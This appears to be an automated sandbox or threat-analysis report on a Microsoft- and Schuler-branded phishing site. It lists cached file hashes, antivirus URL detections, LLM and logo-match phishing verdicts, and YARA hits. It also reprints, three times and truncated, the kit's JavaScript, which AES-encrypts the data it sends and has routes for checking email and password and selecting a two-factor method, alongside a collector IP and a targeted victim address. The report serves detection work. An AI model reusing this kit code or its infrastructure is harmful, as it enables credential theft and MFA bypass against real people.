Chrome Cache Entry: 107	JSON data	3849201717DD51D96B654574CCED466A	E24F74FECAB382E723EDA00292AA9EC36DC35EC0	842748142398582957A7231B1D55996C3036ECB3182289C2C0D48A387BB4DBCE
Chrome Cache Entry: 108	ASCII text, with no line terminators	021197253B2562210B461059E9AD2DF3	179ECE63910591822F738E8E999028C969C4A832	29B65BE90398DCE2A43CFB41EF2A4B0E08FACAE58215B1A03DD454D590B16EC9
Chrome Cache Entry: 109	PNG image data, 79 x 26, 8-bit/color RGB, non-interlaced	5971D9CF0BF237BEFAB32D2ED5822527	E778F9CF67DBA3AA352D69BA263B9D2C234DEA2E	A32010BFC8FCC727DCEF23104D12A4B8C1B5978D828AA096EB0C986F5E22AD19
Chrome Cache Entry: 110	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced	9246CCA8FC3C00F50035F28E9F6B7F7D	3AA538440F70873B574F40CD793060F53EC17A5D	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
Chrome Cache Entry: 111	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	839CB0F55C3D2D5C2F740BDA95CB2878	93F6FA3A2DA8B7184D4B5C5F2065872793370C2E	40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
Chrome Cache Entry: 112	JSON data	9ABF99E9F4E068283E232A2F3A978BD8	739A42442ED8C00B7E743CCB27B4CE57CC8BC478	755ABF6E78956DFE1A010A086E287F712B051C2DB2D57ABC47632DDC58CCA607
Chrome Cache Entry: 113	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, height=1987, bps=182, compression=LZW, PhotometricIntepretation=CMYK, orientation=upper-left, width=3579], baseline, precision 8, 1920x1066, components 3	A9D9B1AA463974CFAB7C2253553852F1	06D9BF34AA776506420CB8FA9E26B522281725FE	794C5FB600D060BD0B30BB54F10CEF9AFD4718F600DE2DB9E2D2472BF4AE906B
Chrome Cache Entry: 114	ASCII text, with very long lines (23398), with no line terminators	C1C51D30D5E7094136F2D828349E520F	10AE8971AD7A8798BC9732707FE4896B57541557	0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
Chrome Cache Entry: 115	HTML document, ASCII text, with very long lines (1445), with CRLF line terminators	E00EA21256F32BFA2D324EFB236BD2BE	EDB7E04169CA9CB2C686ACE51C44A9172674AA11	7B9DF9BD79ACCED005B36E6EA3871710E8A21FD7184B6ECBE4917DB19C090D14
Chrome Cache Entry: 116	SVG Scalable Vector Graphics image	BC3D32A696895F78C19DF6C717586A5D	9191CB156A30A3ED79C44C0A16C95159E8FF689D	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
Chrome Cache Entry: 117	JSON data	3849201717DD51D96B654574CCED466A	E24F74FECAB382E723EDA00292AA9EC36DC35EC0	842748142398582957A7231B1D55996C3036ECB3182289C2C0D48A387BB4DBCE
Chrome Cache Entry: 118	ASCII text, with very long lines (10017)	6C20A2BE8BA900BC0A7118893A2B1072	FF7766FDE1F33882C6E1C481CEED6F6588EA764C	B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
Chrome Cache Entry: 119	PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced	DB783743CD246FF4D77F4A3694285989	B9466716904457641B7831868B47162D8D378D41	5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
Chrome Cache Entry: 120	Web Open Font Format (Version 2), TrueType, length 93276, version 1.0	BCD7983EA5AA57C55F6758B4977983CB	EF3A009E205229E07FB0EC8569E669B11C378EF1	6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
Chrome Cache Entry: 121	ASCII text, with very long lines (1434), with no line terminators	CAC624AB0C197840B2A21BE4B6F6CC58	C4B8B421F6039CCB0421E814774789201138308D	CFCE45FEF72ED85DC66C57FD1FA7262F9686B08188832FBFCE26A7A467D455B0
Chrome Cache Entry: 122	SVG Scalable Vector Graphics image	B59C16CA9BF156438A8A96D45E33DB64	4E51B7D3477414B220F688ADABD76D3AE6472EE3	A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
Chrome Cache Entry: 123	HTML document, ASCII text, with very long lines (5140)	5AE354D0E47EC429A477D040D47E46D1	5EEBB880C21C4C6DA5B5717FA8971C077A422C67	A10DB10037925F1662C8909588EC3B7661EC412D2F344B5859C1C6A4F846ABF8
Chrome Cache Entry: 124	JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, baseline, precision 8, 304x72, components 3	477E4BA2BBA822F5B904CA9A9153DE5A	5B3800C99BC7E045D8BB6BFF90770CBFF16BECAF	C1E6AD95A24330D67C7946807EF843616E8E701D3FA5A3321FC55406F048FD2D
Chrome Cache Entry: 125	SVG Scalable Vector Graphics image	40EB39126300B56BF66C20EE75B54093	83678D94097257EB474713DEC49E8094F49D2E2A	765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
Chrome Cache Entry: 126	ASCII text, with very long lines (636)	93E3F7248853EA26232278A54613F93C	16100C397972A415BFCFCE1A470ACAD68C173375	0EC782544506A0AEA967EA044659C633E1EE735B79E5172CB263797CC5CEFE3A
Chrome Cache Entry: 127	SVG Scalable Vector Graphics image	FE87496CC7A44412F7893A72099C120A	A0C1458C08A815DF63D3CB0406D60BE6607CA699	55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
Chrome Cache Entry: 128	PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced	12BDACC832185D0367ECC23FD24C86CE	4422F316EB4D8C8D160312BB695FD1D944CBFF12	877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
Chrome Cache Entry: 129	SVG Scalable Vector Graphics image	40EB39126300B56BF66C20EE75B54093	83678D94097257EB474713DEC49E8094F49D2E2A	765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
Chrome Cache Entry: 130	SVG Scalable Vector Graphics image	59759B80E24A89C8CD029B14700E646D	651B1921C99E143D3C242DE3FAACFB9AD51DBB53	B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
Chrome Cache Entry: 70	ASCII text, with very long lines (65447)	8FB8FEE4FCC3CC86FF6C724154C49C42	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
Chrome Cache Entry: 71	ASCII text, with very long lines (48316), with no line terminators	2CA03AD87885AB983541092B87ADB299	1A17F60BF776A8C468A185C1E8E985C41A50DC27	8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
Chrome Cache Entry: 72	PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced	333EE830E5AB72C41DD9126A27B4D878	12D8D66EBB3076F3D6069E133C3212F97C8774E1	8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
Chrome Cache Entry: 73	Web Open Font Format, TrueType, length 36696, version 1.0	A69E9AB8AFDD7486EC0749C551051FF2	C34E6AA327B536FB48D1FE03577A47C7EE2231B8	FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
Chrome Cache Entry: 74	PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced	210433A8774859368F3A7B86D125A2A7	408BACDDC39F12CAD285579C102FE4A629862D88	9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
Chrome Cache Entry: 75	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced	9246CCA8FC3C00F50035F28E9F6B7F7D	3AA538440F70873B574F40CD793060F53EC17A5D	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
Chrome Cache Entry: 76	PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced	333EE830E5AB72C41DD9126A27B4D878	12D8D66EBB3076F3D6069E133C3212F97C8774E1	8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
Chrome Cache Entry: 77	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	547988BAC5584B4608466D761E16F370	C11BB71049702528402A31027F200184910A7E23	70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
Chrome Cache Entry: 78	ASCII text, with very long lines (1476), with CRLF line terminators	EA3C880120D132DD7E69D07025F11CF3	466C053FBCC498C1B6D5D57704E579C017EB34B4	B8FE053E02EE76DF190025778161DDCDF3C7DD888A1432C020842C1F08D77646
Chrome Cache Entry: 79	ASCII text, with very long lines (45667)	80F5B8C6A9EEAC15DE93E5A112036A06	F7174635137D37581B11937FC90E9CB325077BCE	0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
Chrome Cache Entry: 80	SVG Scalable Vector Graphics image	B59C16CA9BF156438A8A96D45E33DB64	4E51B7D3477414B220F688ADABD76D3AE6472EE3	A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
Chrome Cache Entry: 81	PNG image data, 79 x 26, 8-bit/color RGB, non-interlaced	5971D9CF0BF237BEFAB32D2ED5822527	E778F9CF67DBA3AA352D69BA263B9D2C234DEA2E	A32010BFC8FCC727DCEF23104D12A4B8C1B5978D828AA096EB0C986F5E22AD19
Chrome Cache Entry: 82	SVG Scalable Vector Graphics image	BC3D32A696895F78C19DF6C717586A5D	9191CB156A30A3ED79C44C0A16C95159E8FF689D	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
Chrome Cache Entry: 83	JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, baseline, precision 8, 304x72, components 3	477E4BA2BBA822F5B904CA9A9153DE5A	5B3800C99BC7E045D8BB6BFF90770CBFF16BECAF	C1E6AD95A24330D67C7946807EF843616E8E701D3FA5A3321FC55406F048FD2D
Chrome Cache Entry: 84	PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced	DB783743CD246FF4D77F4A3694285989	B9466716904457641B7831868B47162D8D378D41	5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
Chrome Cache Entry: 85	PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced	F70FF06D19498D80B130EC78176FD3FF	9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC	DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
Chrome Cache Entry: 86	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, height=1987, bps=182, compression=LZW, PhotometricIntepretation=CMYK, orientation=upper-left, width=3579], baseline, precision 8, 1920x1066, components 3	A9D9B1AA463974CFAB7C2253553852F1	06D9BF34AA776506420CB8FA9E26B522281725FE	794C5FB600D060BD0B30BB54F10CEF9AFD4718F600DE2DB9E2D2472BF4AE906B
Chrome Cache Entry: 87	Unicode text, UTF-8 text, with very long lines (65532), with no line terminators	7BCC10882A3FEE621FCD4FF3CCE42AFA	EDD5F4E27DB9BCA62499172114C24ED4E634E2C4	DB1F4FBD04BA255DDE2485CDA40B918F8286AD166F43BF7F1388EC7E7E52F1DD
Chrome Cache Entry: 88	ASCII text, with very long lines (10450)	E0D37A504604EF874BAD26435D62011F	4301F0D2B729AE22ADECE657D79ECCAA25F429B1	C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
Chrome Cache Entry: 89	SVG Scalable Vector Graphics image	59759B80E24A89C8CD029B14700E646D	651B1921C99E143D3C242DE3FAACFB9AD51DBB53	B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
Chrome Cache Entry: 90	very short file (no magic)	CFCD208495D565EF66E7DFF9F98764DA	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
Chrome Cache Entry: 91	PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced	210433A8774859368F3A7B86D125A2A7	408BACDDC39F12CAD285579C102FE4A629862D88	9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
Chrome Cache Entry: 92	Web Open Font Format (Version 2), TrueType, length 28584, version 1.66	17081510F3A6F2F619EC8C6F244523C7	87F34B2A1532C50F2A424C345D03FE028DB35635	2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
Chrome Cache Entry: 93	JSON data	D6C3586E1215F95064355DA5E988B5AB	05976C9E34F13D1D079B13443610680776B2F389	E61966454BC9AE490D63759AB9688916DB7C7BFEB1D0E28C7EA37E9072C92CD0
Chrome Cache Entry: 94	HTML document, ASCII text, with very long lines (65209), with CRLF line terminators	6EBC998E106A3D9FD63A10279709FA71	390439169BA5CECD2C3FE19AA03E9B137DF2F7C5	EF962F5E2FCB0B5E7E8EA477B75159BB169255210DE673F457971F563B1EF980
Chrome Cache Entry: 95	JSON data	9ABF99E9F4E068283E232A2F3A978BD8	739A42442ED8C00B7E743CCB27B4CE57CC8BC478	755ABF6E78956DFE1A010A086E287F712B051C2DB2D57ABC47632DDC58CCA607
Chrome Cache Entry: 96	SVG Scalable Vector Graphics image	FE87496CC7A44412F7893A72099C120A	A0C1458C08A815DF63D3CB0406D60BE6607CA699	55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
Chrome Cache Entry: 97	Web Open Font Format (Version 2), TrueType, length 28000, version 1.66	A4BCA6C95FED0D0C5CC46CF07710DCEC	73B56E33B82B42921DB8702A33EFD0F2B2EC9794	5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
Chrome Cache Entry: 98	ASCII text, with very long lines (42690)	985094F1486391033426C17505182792	D44FF6BEF2E3D9B2F6DEAA0170458B1AE39350D4	14B108C7F687C327D6AA759FD1D255A981D5D505B241B5B968B674E3BF50B2B9
Chrome Cache Entry: 99	PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced	F70FF06D19498D80B130EC78176FD3FF	9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC	DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE

AV Detection

Antivirus detection for URL or domain

Source: https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180	Avira URL Cloud: Label: malware
Source: https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/favicon.ico	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/#-	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/xy12R7tzrssHzef25	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92	Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: https://vkwek.ckyucle.com	LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social usering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion. DOM: 2.5.pages.csv
Source: https://vkwek.ckyucle.com	LLM: Score: 9 brands: Schuler Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social usering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts. DOM: 2.7.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	Matcher: Template: microsoft matched
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	Matcher: Template: microsoft matched

Phishing site detected (based on shot match)

Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	Matcher: Template: captcha matched

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => 